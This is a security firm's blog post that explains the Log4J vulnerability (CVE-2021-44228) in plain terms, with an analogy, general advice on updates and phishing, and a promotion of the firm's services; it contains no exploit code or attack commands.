On December 9th, the greater information security community had its world turned upside down when a newly uncovered zero-day vulnerability was found in Apache’s Java logging library Log4J. Within hours of this news, every major software company was in disaster mode, attempting to determine how their products were affected and how to fix a patch could be released. Jen Easterly, director of the U.S Cybersecurity and Infrastructure Security Agency (CISA), stated this is the most severe security flaw she has seen in her career, but just how bad is this vulnerability?
Why is this so bad?
The Log4J vulnerability is being tracked as CVE – 2021-44228 by MITRE, with this critical vulnerability’s severity set at CVSS 10/10. This vulnerability is unlike anything researchers have ever seen before, with the size and scope affecting millions of applications across the world. Log4J is a section of code that assists software applications in tracking past activities. Companies use this component when developing new applications for a variety of reasons. The code is widely used due to its efficiency and open-source nature, allowing for cost savings on the developers’ end. Earlier this December, a Minecraft community forum discovered the vulnerability after a person sent a remote code exploitation (RCE) to a friend’s Minecraft server. Unfortunately, the RCE worked, and the same method of compromise can be duplicated and used against millions of applications that utilize that same line of code.
What does this mean?
Imagine a specific type of bolt attached to the tire of a car suddenly becomes loose and stops working. Changing out that set of bolts on one car is easy but think of how difficult it would be to find every car that uses that ineffective type of bolt. That is what the information security community is dealing with, with Log4J. By injecting a malicious line of code into the logs, an outside threat actor can gain total access to the affected system, allowing them to create botnets, mine cryptocurrency, or distribute ransomware to other connected systems.
This vulnerability is terrifying for so many companies because of the ubiquity and triviality of this issue. The line of malicious code needed to exploit the vulnerability only runs 12 characters long. Attackers that generally wouldn’t have the skills to pull off a remote code exploitation on a vulnerable application now have one of the most accessible attack vectors to unpatched systems. This, coupled with the widespread use of the open-source code in the vulnerability, means that millions of applications are susceptible to attacks from everyone, from nation-state threat actors to lower-level hackers.
What is the solution?
Hackers will have to deliver a line of malicious code to take advantage of vulnerable applications running Log4J. One of the easiest ways to deliver this code is through phishing campaigns. Be sure to keep an eye out in the coming weeks for any suspicious emails prompting you to click on a link or open any attachments. Always look to authenticate the sender before replying to any email chains, if the address looks suspicious, do not reply. Another step users can take to stay protected is routinely checking for updates on frequently used applications like your internet browser, mobile applications, and video games. Developers are hard at work creating patches to this security vulnerability. Promptly install all updates and keep an eye out for companies giving any additional advice or directives to follow to help secure your infrastructure.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time – https://www.netizen.net/contact